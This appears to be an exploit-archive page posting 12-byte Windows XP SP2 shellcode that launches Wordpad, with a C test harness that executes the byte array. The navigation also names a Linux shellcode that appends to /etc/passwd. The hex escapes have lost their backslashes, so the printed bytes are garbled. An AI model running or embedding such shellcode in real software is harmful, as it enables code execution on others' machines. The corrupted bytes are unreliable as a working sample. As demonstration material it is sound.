[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Windows XP Pro Sp2 English "Wordpad" Shellcode
# Published : 2010-01-03
# Author : Aodrulez
# Previous Title : Windows XP Pro Sp2 English "Message-Box" Shellcode
# Next Title : linux/x86 append "/etc/passwd" & exit() 107 bytes


+-------------------------------------------------+
| Windows XP Pro Sp2 English "Wordpad" Shellcode. |
+-------------------------------------------------+

Size         : 12 Bytes,Null Free.
Author       : Aodrulez. 
Email        : f3arm3d3ar@gmail.com
Milw0rm      : www.milw0rm.com/author/1620

Shellcode =   "x68x87x4cx80x7cxb8"
              "x6dx13x86x7cxffxd0"

+-----------------+
| Shellcodetest.c |
+-----------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
char code[] = "x68x87x4cx80x7cxb8"
              "x6dx13x86x7cxffxd0";


int main(int argc, char **argv)
{
  
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+-------------------+
| Greetz Fly Out To |
+-------------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1] Amforked()	 : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~